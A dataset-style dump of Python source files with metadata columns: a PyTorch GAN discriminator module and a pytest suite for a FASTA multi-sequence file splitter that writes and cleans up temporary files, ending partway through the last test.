| 28.81746 | 94 | 0.641421 | 518 | 3,631 | 4.281853 | 0.148649 | 0.086564 | 0.048693 | 0.064923 | 0.823715 | 0.823715 | 0.823715 | 0.823715 | 0.823715 | 0.823715 | 0 | 0.007925 | 0.235472 | 3,631 | 125 | 95 | 29.048 | 0.791066 | 0.095841 | 0 | 0.818182 | 0 | 0 | 0.002452 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077922 | false | 0 | 0.051948 | 0 | 0.207792 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e712c8ebf4590f49b8cd49c01730c91adecb8fd1 | 2,723 | py | Python | gan.py | orhunguley/unsupervised_object_learning | bae764a7ff3fb77f0050617f19c37fa2d44ed3e2 | [
"MIT"
] | null | null | null | gan.py | orhunguley/unsupervised_object_learning | bae764a7ff3fb77f0050617f19c37fa2d44ed3e2 | [
"MIT"
] | null | null | null | gan.py | orhunguley/unsupervised_object_learning | bae764a7ff3fb77f0050617f19c37fa2d44ed3e2 | [
"MIT"
] | null | null | null | import argparse
import os
import numpy as np
import math
import torchvision.transforms as transforms
from torchvision.utils import save_image
from torch.utils.data import DataLoader
from torchvision import datasets
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch
class Discriminator(nn.Module):
def __init__(self):
super(Discriminator, self).__init__()
def discriminator_block(in_filters, out_filters, bn=True):
"""Returns layers of each discriminator block"""
block = [nn.Conv2d(in_filters, out_filters, 3, 2, 1), nn.LeakyReLU(0.2, inplace=True), nn.Dropout2d(0.25)]
if bn:
block.append(nn.BatchNorm2d(out_filters, 0.8))
return block
self.conv_blocks = nn.Sequential(
*discriminator_block(3, 32, bn=False),
*discriminator_block(32, 64),
*discriminator_block(64, 128),
*discriminator_block(128, 256),
)
# The height and width of downsampled image
ds_size = 128 // 2 ** 4
# Output layers
self.adv_layer = nn.Sequential(nn.Linear(256 * ds_size ** 2, 1), nn.Sigmoid())
# self.aux_layer = nn.Sequential(nn.Linear(256 * ds_size ** 2, opt.n_classes), nn.Softmax())
def forward(self, img):
out = self.conv_blocks(img)
out = out.view(out.shape[0], -1)
validity = self.adv_layer(out)
# label = self.aux_layer(out)
return validity
class MaskDiscriminator(nn.Module):
def __init__(self):
super(Discriminator, self).__init__()
def discriminator_block(in_filters, out_filters, bn=True):
"""Returns layers of each discriminator block"""
block = [nn.Conv2d(in_filters, out_filters, 3, 2, 1), nn.LeakyReLU(0.2, inplace=True), nn.Dropout2d(0.25)]
if bn:
block.append(nn.BatchNorm2d(out_filters, 0.8))
return block
self.conv_blocks = nn.Sequential(
*discriminator_block(3, 32, bn=False),
*discriminator_block(32, 64),
*discriminator_block(64, 128),
*discriminator_block(128, 256),
)
# The height and width of downsampled image
ds_size = 128 // 2 ** 4
# Output layers
self.adv_layer = nn.Sequential(nn.Linear(256 * ds_size ** 2, 1), nn.Sigmoid())
# self.aux_layer = nn.Sequential(nn.Linear(256 * ds_size ** 2, opt.n_classes), nn.Softmax())
def forward(self, img):
out = self.conv_blocks(img)
out = out.view(out.shape[0], -1)
validity = self.adv_layer(out)
# label = self.aux_layer(out)
return validity | 33.207317 | 118 | 0.619905 | 355 | 2,723 | 4.594366 | 0.242254 | 0.132434 | 0.02943 | 0.046597 | 0.810546 | 0.810546 | 0.810546 | 0.810546 | 0.810546 | 0.810546 | 0 | 0.047094 | 0.266985 | 2,723 | 82 | 119 | 33.207317 | 0.77004 | 0.160118 | 0 | 0.703704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e7766029d2faf47a1db8b4a7b9958acb6858e9cd | 37,902 | py | Python | fastasplitter_splitter/tests/test_splitter.py | alan-lira/fasta-splitter | 3b29a128ddcc71c06c97104bfefdee52ef7359df | [
"MIT"
] | 1 | 2021-07-17T04:52:55.000Z | 2021-07-17T04:52:55.000Z | fastasplitter_splitter/tests/test_splitter.py | alan-lira/fasta-splitter | 3b29a128ddcc71c06c97104bfefdee52ef7359df | [
"MIT"
] | 5 | 2021-07-16T07:48:54.000Z | 2021-07-27T15:10:25.000Z | fastasplitter_splitter/tests/test_splitter.py | alan-lira/fasta-splitter | 3b29a128ddcc71c06c97104bfefdee52ef7359df | [
"MIT"
] | 1 | 2021-07-16T07:27:46.000Z | 2021-07-16T07:27:46.000Z | from pathlib import Path
from click.testing import CliRunner
import pytest
import fastasplitter_splitter.splitter
import fastasplitter_splitter.splitter_exceptions
import sys
import runpy
def test_when_number_of_arguments_equals_one_then_ok():
number_of_arguments_provided = 1
assert fastasplitter_splitter.splitter.check_if_is_valid_number_of_arguments(number_of_arguments_provided) is None
def test_when_number_of_arguments_not_equals_one_then_throws_invalid_number_of_arguments_exception():
number_of_arguments_provided = 2
with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidNumberofArgumentsError) as pytest_wrapped_e:
fastasplitter_splitter.splitter.check_if_is_valid_number_of_arguments(number_of_arguments_provided)
invalid_number_of_arguments_message = "Invalid number of arguments provided!\n" \
"Expected: 1 argument (FASTA multiple sequences file).\n" \
"Provided: {0} argument(s).".format(number_of_arguments_provided)
assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidNumberofArgumentsError
assert str(pytest_wrapped_e.value) == invalid_number_of_arguments_message
def test_when_multiple_sequences_file_not_exists_then_throws_file_not_found_exception():
inexistent_multiple_sequences_file = Path("inexistent_multiple_sequences.fasta")
with pytest.raises(FileNotFoundError) as pytest_wrapped_e:
fastasplitter_splitter.splitter.check_if_multiple_sequences_file_exists(inexistent_multiple_sequences_file)
file_not_found_message = "FASTA multiple sequences file not found!"
assert pytest_wrapped_e.type == FileNotFoundError
assert str(pytest_wrapped_e.value) == file_not_found_message
def test_when_multiple_sequences_file_exists_then_return_multiple_sequences_file_extension():
multiple_sequences_file_extension_expected = ".fasta"
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w"):
pass
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
assert multiple_sequences_file_extension_returned == multiple_sequences_file_extension_expected
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_does_not_have_fasta_extension_then_throws_invalid_extension_file_exception():
temporary_multiple_sequences_file = Path("sequences.txt")
with open(temporary_multiple_sequences_file, mode="w"):
pass
with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidExtensionFileError) as pytest_wrapped_e:
fastasplitter_splitter.splitter \
.check_if_multiple_sequences_file_has_fasta_extension(temporary_multiple_sequences_file)
supported_fasta_file_extensions = fastasplitter_splitter.splitter.get_supported_fasta_file_extensions()
invalid_extension_file_message = "Only FASTA extension files ({0}) are allowed!" \
.format(", ".join(supported_fasta_file_extensions))
assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidExtensionFileError
assert str(pytest_wrapped_e.value) == invalid_extension_file_message
temporary_multiple_sequences_file.unlink()
def test_when_description_line_is_parsed_then_return_description_lines_count():
description_line_count_expected = 1
line = ">ValidDescription1 |text1"
individual_sequences_start_token = ">"
description_lines_count_returned = 0
description_lines_count_returned = fastasplitter_splitter.splitter \
.parse_description_line(line, individual_sequences_start_token, description_lines_count_returned)
assert description_lines_count_returned == description_line_count_expected
def test_when_description_line_contains_whitespace_right_after_start_token_then_return_true():
line = "> InvalidDescription1"
individual_sequences_start_token = ">"
assert fastasplitter_splitter.splitter. \
description_line_contains_whitespace_right_after_start_token(line, individual_sequences_start_token)
def test_when_description_line_contains_no_whitespace_right_after_start_token_then_return_false():
line = ">ValidDescription1"
individual_sequences_start_token = ">"
assert not fastasplitter_splitter.splitter. \
description_line_contains_whitespace_right_after_start_token(line, individual_sequences_start_token)
def test_when_description_line_has_no_information_after_start_token_then_return_true():
line = ">"
individual_sequences_start_token = ">"
assert fastasplitter_splitter.splitter. \
description_line_has_no_information_after_start_token(line, individual_sequences_start_token)
def test_when_description_line_has_information_after_start_token_then_return_false():
line = ">AAA"
individual_sequences_start_token = ">"
assert not fastasplitter_splitter.splitter. \
description_line_has_no_information_after_start_token(line, individual_sequences_start_token)
def test_when_invalid_description_line_is_parsed_then_return_invalid_description_lines_count():
invalid_description_lines_count_expected = 1
line = "> InvalidDescription1"
individual_sequences_start_token = ">"
invalid_description_lines_count_returned = 0
invalid_description_lines_count_returned = \
fastasplitter_splitter.splitter.parse_invalid_description_line(line,
individual_sequences_start_token,
invalid_description_lines_count_returned)
assert invalid_description_lines_count_returned == invalid_description_lines_count_expected
def test_when_multiple_sequences_file_is_parsed_then_return_sequences_file_counter():
description_lines_count_expected = 2
invalid_description_lines_count_expected = 1
lines_count_expected = 4
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write("> InvalidDescription1\nAAA\n")
multiple_sequences_file.write(">ValidDescription1 |text1\nCCC\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter_splitter.splitter.get_multiple_sequences_file_counters(temporary_multiple_sequences_file)
assert description_lines_count_returned == description_lines_count_expected
assert invalid_description_lines_count_returned == invalid_description_lines_count_expected
assert lines_count_returned == lines_count_expected
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_has_not_any_description_line_then_throws_invalid_formatted_fasta_file_exception():
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write("AAA\n")
multiple_sequences_file.write("CCC\n")
multiple_sequences_file.write("GGG\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter_splitter.splitter.get_multiple_sequences_file_counters(temporary_multiple_sequences_file)
with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter_splitter.splitter \
.check_if_multiple_sequences_file_has_any_description_line(temporary_multiple_sequences_file,
description_lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' does not have any description line!" \
.format(str(temporary_multiple_sequences_file))
assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_multiple_sequences_file.unlink()
def test_when_mult_sequences_file_has_invalid_description_lines_then_throws_invalid_formatted_fasta_file_exception():
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write("> InvalidDescription1\nAAA\n")
multiple_sequences_file.write(">ValidDescription1 |text1\nCCC\n")
multiple_sequences_file.write(">ValidDescription2|text2\nGGG\n")
multiple_sequences_file.write("> InvalidDescription2|text2\nTTT\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter_splitter.splitter.get_multiple_sequences_file_counters(temporary_multiple_sequences_file)
with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter_splitter.splitter \
.check_if_multiple_sequences_file_has_any_invalid_description_line(temporary_multiple_sequences_file,
invalid_description_lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' contains {1} line(s) with invalid description format!" \
.format(str(temporary_multiple_sequences_file), str(2))
assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_has_no_data_then_throws_invalid_formatted_fasta_file_exception():
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">ValidDescription1")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter_splitter.splitter.get_multiple_sequences_file_counters(temporary_multiple_sequences_file)
with pytest.raises(fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter_splitter.splitter.check_if_multiple_sequences_file_has_no_data(temporary_multiple_sequences_file,
lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' seems a empty fasta file!" \
.format(str(temporary_multiple_sequences_file))
assert pytest_wrapped_e.type == fastasplitter_splitter.splitter_exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_has_all_valid_lines_then_ok():
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">ValidDescription1|text1\nAAA\n")
multiple_sequences_file.write(">ValidDescription2 |text2\nCCC\n")
multiple_sequences_file.write(">ValidDescription3\nGGG\n")
assert fastasplitter_splitter.splitter \
.check_if_is_valid_multiple_sequences_file(temporary_multiple_sequences_file) is None
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_path_is_on_the_same_level_then_return_empty_path_underscored_string():
multiple_sequences_file_same_level_path_parents_underscored_expected = ""
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w"):
pass
multiple_sequences_file_same_level_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_same_level_path_parents_underscored_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents_underscored(multiple_sequences_file_same_level_path_parents_returned)
assert multiple_sequences_file_same_level_path_parents_underscored_returned \
== multiple_sequences_file_same_level_path_parents_underscored_expected
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_path_is_one_level_below_then_return_path_underscored_string():
multiple_sequences_file_one_level_below_path_parents_underscored_expected = "ParentBelow"
temporary_directory_one_level_below = Path("ParentBelow")
temporary_directory_one_level_below.mkdir()
temporary_multiple_sequences_file = temporary_directory_one_level_below.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w"):
pass
mult_sequences_file_one_level_below_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_one_level_below_path_parents_underscored_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents_underscored(mult_sequences_file_one_level_below_path_parents_returned)
assert multiple_sequences_file_one_level_below_path_parents_underscored_returned \
== multiple_sequences_file_one_level_below_path_parents_underscored_expected
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_below.rmdir()
def test_when_multiple_sequences_file_path_is_one_level_above_then_return_path_underscored_string():
multiple_sequences_file_one_level_above_path_parents_underscored_expected = \
str(Path.cwd().parent).replace("/", "_").replace("\\", "_") \
.replace(".", "").replace(":", "_").replace("_", "", 1) + "_ParentAbove"
temporary_directory_one_level_above = Path.cwd().parent.joinpath("ParentAbove")
temporary_directory_one_level_above.mkdir()
temporary_multiple_sequences_file = temporary_directory_one_level_above.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w"):
pass
mult_sequences_file_one_level_above_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_one_level_above_path_parents_underscored_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents_underscored(mult_sequences_file_one_level_above_path_parents_returned)
assert multiple_sequences_file_one_level_above_path_parents_underscored_returned \
== multiple_sequences_file_one_level_above_path_parents_underscored_expected
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_above.rmdir()
def test_when_multiple_sequences_file_is_valid_then_return_individual_sequences_name_list():
individual_sequences_name_list_expected = ["Sequence1", "Sequence2", "Sequence3"]
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
for index in range(len(individual_sequences_name_list_returned)):
assert individual_sequences_name_list_returned[index] == individual_sequences_name_list_expected[index]
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_is_valid_then_return_individual_sequences_data_list():
individual_sequences_data_list_expected = ["AAA", "CCC", "GGG"]
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
individual_sequences_data_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_data_list(temporary_multiple_sequences_file)
for index in range(len(individual_sequences_data_list_returned)):
assert individual_sequences_data_list_returned[index][1] == individual_sequences_data_list_expected[index]
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_is_valid_and_path_is_on_the_same_level_then_split_sequences_and_write_to_disk():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
individual_sequences_files_written_count_expected = 3
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_same_level_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_data_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_data_list(temporary_multiple_sequences_file)
individual_sequences_files_written_count_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files(multiple_sequences_file_same_level_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned,
individual_sequences_data_list_returned)
assert individual_sequences_files_written_count_returned == individual_sequences_files_written_count_expected
assert sequence1_file_expected.exists()
assert sequence2_file_expected.exists()
assert sequence3_file_expected.exists()
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_is_valid_and_path_is_one_level_below_then_split_sequences_and_write_to_disk():
sequence1_file_expected = Path.cwd().joinpath("ParentBelow").joinpath("Sequence1.fasta")
sequence2_file_expected = Path.cwd().joinpath("ParentBelow").joinpath("Sequence2.fasta")
sequence3_file_expected = Path.cwd().joinpath("ParentBelow").joinpath("Sequence3.fasta")
individual_sequences_files_written_count_expected = 3
temporary_directory_one_level_below = Path("ParentBelow")
temporary_directory_one_level_below.mkdir()
temporary_multiple_sequences_file = temporary_directory_one_level_below.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_one_level_below_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_data_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_data_list(temporary_multiple_sequences_file)
individual_sequences_files_written_count_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files(multiple_sequences_file_one_level_below_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned,
individual_sequences_data_list_returned)
assert individual_sequences_files_written_count_returned == individual_sequences_files_written_count_expected
assert sequence1_file_expected.exists()
assert sequence2_file_expected.exists()
assert sequence3_file_expected.exists()
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_below.rmdir()
def test_when_multiple_sequences_file_is_valid_and_path_is_one_level_above_then_split_sequences_and_write_to_disk():
sequence1_file_expected = Path.cwd().parent.joinpath("ParentAbove").joinpath("Sequence1.fasta")
sequence2_file_expected = Path.cwd().parent.joinpath("ParentAbove").joinpath("Sequence2.fasta")
sequence3_file_expected = Path.cwd().parent.joinpath("ParentAbove").joinpath("Sequence3.fasta")
individual_sequences_files_written_count_expected = 3
temporary_directory_one_level_above = Path.cwd().parent.joinpath("ParentAbove")
temporary_directory_one_level_above.mkdir()
temporary_multiple_sequences_file = temporary_directory_one_level_above.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_one_level_above_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_data_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_data_list(temporary_multiple_sequences_file)
individual_sequences_files_written_count_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files(multiple_sequences_file_one_level_above_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned,
individual_sequences_data_list_returned)
assert individual_sequences_files_written_count_returned == individual_sequences_files_written_count_expected
assert sequence1_file_expected.exists()
assert sequence2_file_expected.exists()
assert sequence3_file_expected.exists()
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_above.rmdir()
def test_when_multiple_sequences_file_path_is_on_the_same_level_then_write_sequences_path_list_file_to_disk():
individual_sequences_path_list_file_expected = Path("Sequences_Path_List.txt")
individual_sequences_files_path_list_file_path_expected = \
Path.cwd().joinpath(individual_sequences_path_list_file_expected)
individual_sequences_path_list_file_data_expected = ["Sequence1.fasta", "Sequence2.fasta", "Sequence3.fasta"]
temporary_multiple_sequences_file = Path("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_same_level_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_files_path_list_file_path_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files_path_list(multiple_sequences_file_same_level_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned)
assert individual_sequences_files_path_list_file_path_returned \
== individual_sequences_files_path_list_file_path_expected
assert individual_sequences_path_list_file_expected.exists()
individual_sequences_path_list_file_data_returned = []
with open(individual_sequences_path_list_file_expected, mode="r") as individual_sequences_files_path_list_file:
for line in individual_sequences_files_path_list_file:
individual_sequences_path_list_file_data_returned.append(line.strip())
for index in range(len(individual_sequences_path_list_file_data_returned)):
assert individual_sequences_path_list_file_data_returned[index] \
== individual_sequences_path_list_file_data_expected[index]
individual_sequences_path_list_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
def test_when_multiple_sequences_file_path_is_one_level_below_then_write_sequences_path_list_file_to_disk():
individual_sequences_path_list_file_expected = Path("ParentBelow_Sequences_Path_List.txt")
individual_sequences_files_path_list_file_path_expected = \
Path.cwd().joinpath(individual_sequences_path_list_file_expected)
temporary_directory_one_level_below = Path("ParentBelow")
temporary_directory_one_level_below.mkdir()
individual_sequences_path_list_file_data_expected = \
[str(temporary_directory_one_level_below.joinpath("Sequence1.fasta")),
str(temporary_directory_one_level_below.joinpath("Sequence2.fasta")),
str(temporary_directory_one_level_below.joinpath("Sequence3.fasta"))]
temporary_multiple_sequences_file = temporary_directory_one_level_below.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_one_level_below_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_files_path_list_file_path_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files_path_list(multiple_sequences_file_one_level_below_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned)
assert individual_sequences_files_path_list_file_path_returned \
== individual_sequences_files_path_list_file_path_expected
assert individual_sequences_path_list_file_expected.is_file()
individual_sequences_path_list_file_data_returned = []
with open(individual_sequences_path_list_file_expected, mode="r") as individual_sequences_files_path_list_file:
for line in individual_sequences_files_path_list_file:
individual_sequences_path_list_file_data_returned.append(line.strip())
for index in range(len(individual_sequences_path_list_file_data_returned)):
assert individual_sequences_path_list_file_data_returned[index] \
== individual_sequences_path_list_file_data_expected[index]
individual_sequences_path_list_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_below.rmdir()
def test_when_multiple_sequences_file_path_is_one_level_above_then_write_sequences_path_list_file_to_disk():
individual_sequences_path_list_file_expected = Path.cwd() \
.joinpath(str(Path.cwd().parent)
.replace("/", "_").replace("\\", "_").replace(".", "").replace(":", "_").replace("_", "", 1)
+ str(Path.cwd().suffix) + "_ParentAbove_Sequences_Path_List.txt")
individual_sequences_files_path_list_file_path_expected = \
Path.cwd().joinpath(individual_sequences_path_list_file_expected)
temporary_directory_one_level_above = Path.cwd().parent.joinpath("ParentAbove")
temporary_directory_one_level_above.mkdir()
individual_sequences_path_list_file_data_expected = \
[str(temporary_directory_one_level_above.joinpath("Sequence1.fasta")),
str(temporary_directory_one_level_above.joinpath("Sequence2.fasta")),
str(temporary_directory_one_level_above.joinpath("Sequence3.fasta"))]
temporary_multiple_sequences_file = temporary_directory_one_level_above.joinpath("sequences.fasta")
with open(temporary_multiple_sequences_file, mode="w") as multiple_sequences_file:
multiple_sequences_file.write(">Sequence1|text1\nAAA\n")
multiple_sequences_file.write(">Sequence2 |text2\nCCC\n")
multiple_sequences_file.write(">Sequence3\nGGG\n")
multiple_sequences_file_one_level_above_path_parents_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_path_parents(temporary_multiple_sequences_file)
multiple_sequences_file_extension_returned = fastasplitter_splitter.splitter \
.get_multiple_sequences_file_extension(temporary_multiple_sequences_file)
individual_sequences_name_list_returned = fastasplitter_splitter.splitter \
.get_individual_sequences_name_list(temporary_multiple_sequences_file)
individual_sequences_files_path_list_file_path_returned = fastasplitter_splitter.splitter \
.write_individual_sequences_files_path_list(multiple_sequences_file_one_level_above_path_parents_returned,
multiple_sequences_file_extension_returned,
individual_sequences_name_list_returned)
assert individual_sequences_files_path_list_file_path_returned \
== individual_sequences_files_path_list_file_path_expected
assert individual_sequences_path_list_file_expected.is_file()
individual_sequences_path_list_file_data_returned = []
with open(individual_sequences_path_list_file_expected, mode="r") as individual_sequences_files_path_list_file:
for line in individual_sequences_files_path_list_file:
individual_sequences_path_list_file_data_returned.append(line.strip())
for index in range(len(individual_sequences_path_list_file_data_returned)):
assert individual_sequences_path_list_file_data_returned[index] \
== individual_sequences_path_list_file_data_expected[index]
individual_sequences_path_list_file_expected.unlink()
temporary_multiple_sequences_file.unlink()
temporary_directory_one_level_above.rmdir()
def test_when_execute_split_command_without_sequences_file_path_argument_then_return_exit_error_code_one():
runner = CliRunner()
result = runner.invoke(fastasplitter_splitter.splitter.splitter_group, ["split", ""])
assert result.return_value is None
assert result.exit_code == 1
assert result.exc_info[0] == FileNotFoundError
assert str(result.exception) == "FASTA multiple sequences file not found!"
def test_when_execute_split_command_with_just_sequences_file_path_then_return_successful_exit_code_zero():
